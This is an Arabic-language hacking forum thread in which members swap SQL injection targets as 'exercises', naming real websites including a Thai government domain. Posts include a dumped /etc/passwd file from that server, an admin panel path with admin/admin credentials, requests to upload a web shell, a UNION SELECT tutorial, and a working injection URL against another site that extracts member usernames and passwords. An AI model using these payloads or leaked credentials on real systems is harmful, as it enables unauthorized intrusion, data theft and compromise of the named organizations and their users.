|
احسنت اخي الكريم في المرة القادمة , تفضل بوضع رابط الاستغلال كاملا لك تحياتي |
السلام عليكم بما ان بعض الاخوة يتفاعلون مع هذه التمارين , اليكم الموقع التالي http://www.opdc.go.th الاصدار 5 لكم تحياتي |
تمااارين قاااسيه هع هع بس نبي نرفع شل عليهااا مدري كيف الطريقه |
اخي ممكن سوأل كيف الاستفاده من هذه [warning]root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh dhcp:x:101:102::/nonexistent:/bin/false syslog:x:102:103::/home/syslog:/bin/false klog:x:103:104::/home/klog:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin eodi:x:1000:1000:eodi,,,:/home/eodi:/bin/bash ting:x:1001:1001:ting eodi,,,:/home/ting:/bin/bash mysql:x:105:114:MySQL Server,,,:/var/lib/mysql:/bin/false adminopdc:x:1002:1002:adminopdc,,,:/home/adminopdc:/bin/bash proftpd:x:106:65534::/var/run/proftpd:/bin/false ftp:x:107:65534::/home/ftp:/bin/false opdcmoi:x:1017:100:opdcmoi:/data/www/www.opdc.go.th/moi:/bin/sh goodpractice:x:1014:100:goodpractice:/data/www/www.opdc.go.th/goodpracticemodel:/bin/sh websiteopdc:x:1012:100:websiteopdc:/data/www/www.opdc.go.th:/bin/sh gcs:x:1010:100:gcs:/data/www/www.opdc.go.th/gcs:/bin/sh tkhpo:x:1009:100:tkhpo:/data/www/www.opdc.go.th/tkhpo:/bin/sh km:x:1008:100:km:/data/www/km.opdc.go.th:/bin/sh webmaster:x:1007:100:webmaster:/data/www/www.opdc.go.th:/bin/sh incentives50:x:1000:100:incentives50:/data/www/www.opdc.go.th/incentives50:/bin/sh munin:x:108:115::/var/lib/munin:/bin/false clamav:x:109:116::/var/lib/clamav:/bin/false postfix:x:110:118::/var/spool/postfix:/bin/false test:x:1003:100:test,test,,:/home/test:/bin/bash moiftp:x:1005:100:moiftp,,,:/data/www/moi.opdc.go.th:/bin/sh tkhpoftp:x:1006:100:tkhpoftp,,,:/data/www/tkhpo.opdc.go.th:/bin/sh gcsftp:x:1004:100:gcsftp,,,:/data/www/gcs.opdc.go.th/:/bin/sh incentives:x:1011:100:incentives,,,:/data/www/incentives.opdc.go.th:/bin/sh osmftp:x:1013:100:osm,,,:/data/www/osm.opdc.go.th:/bin/sh [/warning] |
اقتباس:
في انتظار احد العناكب لك تحياتي |
اقتباس:
لك تحياتي |
أخ مارااك أخي في كثير من المواقع لما بتريد أن تحقنها ما بتظهر الأعمة ممكن تقول ايش العمل ؟؟؟ |
اقتباس:
تفضل بوضع مثال لأشرح لك الطريقة ان كان فعلا الموقع قابلا للحقن |
اقتباس:
لكن أنا لما فحصته وجدت فيه الخطأ و استخرجت المجال اللي محصور فيه الأعمدة المصابة لكن لما أطبق أمر انيو+سيلكت + عدد الأعمدة ( 1,,2,3,4........) ما يطلعو الجداول المصابه ايش العمل في هذه الحالة ؟؟ |
هذا هوه الاستغلال الكامل للموقع http://www.opdc.go.th/english/main/c...cs.admin--+%27 واليوزر : admin والباس : admin وهذا مسار لوحة التحكم http://www.opdc.go.th/english/admin ياريت الي يكدر يرفع شل ويضع الرابط هنا لتدريب عليه لا غير smilies14 |
اقتباس:
يا اخى عند استعمال امر اونيون وسلكت لاظهار العمود المصاب يجب ان تضع قبل الرقم المتغير علامه - مثال http://www.xxxxxxxxx.com/news.php?id=-2 UNION SELECT 1,2,3,4,5,6,7 لاحظ علامه - اللى قبل رقم 2 لو حذفت هذه العلامه ما راح يظهر العمود المصاب ولكن لو وضعتها راح تلقى العمود ظاهر ولو فيه اي شئ غير واضح لا تتردد بوضع استفسارك وبالتوفيق.. |
اقتباس:
لك تحياتي |
أخي ٍthe cold zero أنا واضع كل شيئ يعني الحقن كل صحيح لكن الأعمدة لا تظهر |
|
تفضل وفى انتظار الموقع القادم http://mza.ge/go.php?Site_id=-12 UNION SELECT 1,concat(id,0x3a,username,0x3a,password),3,4,5,6,7 +from+members-- user:john pass:1234 |
| الساعة الآن 11:35 PM |
[ vBspiders.Com Network ]